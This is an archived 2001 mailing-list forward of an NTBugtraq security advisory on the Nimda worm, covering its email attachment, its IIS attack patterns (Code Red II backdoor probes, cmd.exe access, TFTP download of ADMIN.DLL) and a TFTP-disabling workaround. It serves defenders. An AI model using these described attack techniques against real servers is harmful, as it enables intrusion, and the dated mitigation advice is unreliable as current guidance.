The text of the new worm thingy info... At 11:30 AM 9/18/2001 -0400, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >There have been numerous reports of IIS attacks being generated by >machines over a broad range of IP addresses. These "infected" >machines are using a wide variety of attacks which attempt to exploit >already known and patched vulnerabilities against IIS. > >It appears that the attacks can come both from email and from the >network. > >A new worm, being called w32.nimda.amm, is being sent around. The >attachment is called README.EXE and comes as a MIME-type of >"audio/x-wav" together with some html parts. There appears to be no >text in this message when it is displayed by Outlook when in >Auto-Preview mode (always a good indication there's something not >quite right with an email.) > >The network attacks against IIS boxes are a wide variety of attacks. >Amongst them appear to be several attacks that assume the machine is >compromised by Code Red II (looking for ROOT.EXE in the /scripts and >/msadc directory, as well as an attempt to use the /c and /d virtual >roots to get to CMD.EXE). Further, it attempts to exploit numerous >other known IIS vulnerabilities. > >One thing to note is the attempt to execute TFTP.EXE to download a >file called ADMIN.DLL from (presumably) some previously compromised >box. > >Anyone who discovers a compromised machine (a machine with ADMIN.DLL >in the /scripts directory), please forward me a copy of that .dll >ASAP. > >Also, look for TFTP traffic (UDP69). As a safeguard, consider doing >the following; > >edit %systemroot/system32/drivers/etc/services. > >change the line; > >tftp 69/udp > >to; > >tftp 0/udp > >thereby disabling the TFTP client. W2K has TFTP.EXE protected by >Windows File Protection so can't be removed. > >More information as it arises. > >Cheers, >Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor > >-----BEGIN PGP SIGNATURE----- >Version: PGP Personal Privacy 6.5.2 > >iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH >Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 >iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO >hSW7yN2lhJc= >=YAwc >-----END PGP SIGNATURE----- > >============================================================================ >Delivery co-sponsored by Trend Micro, Inc. >============================================================================ >TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > >If you are worried about email viruses, you need Trend Micro ScanMail for >Exchange. ScanMail is the first antivirus solution that seamlessly >integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail >ensures 100% inbound and outbound email virus scanning and provides remote >software management. Download a FREE 30-day trial copy of ScanMail and find >out why it is the best: >http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Get the mailserver that powers this list at http://www.coolfusion.com Archives: http://www.mail-archive.com/cf-community@houseoffusion.com/ Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists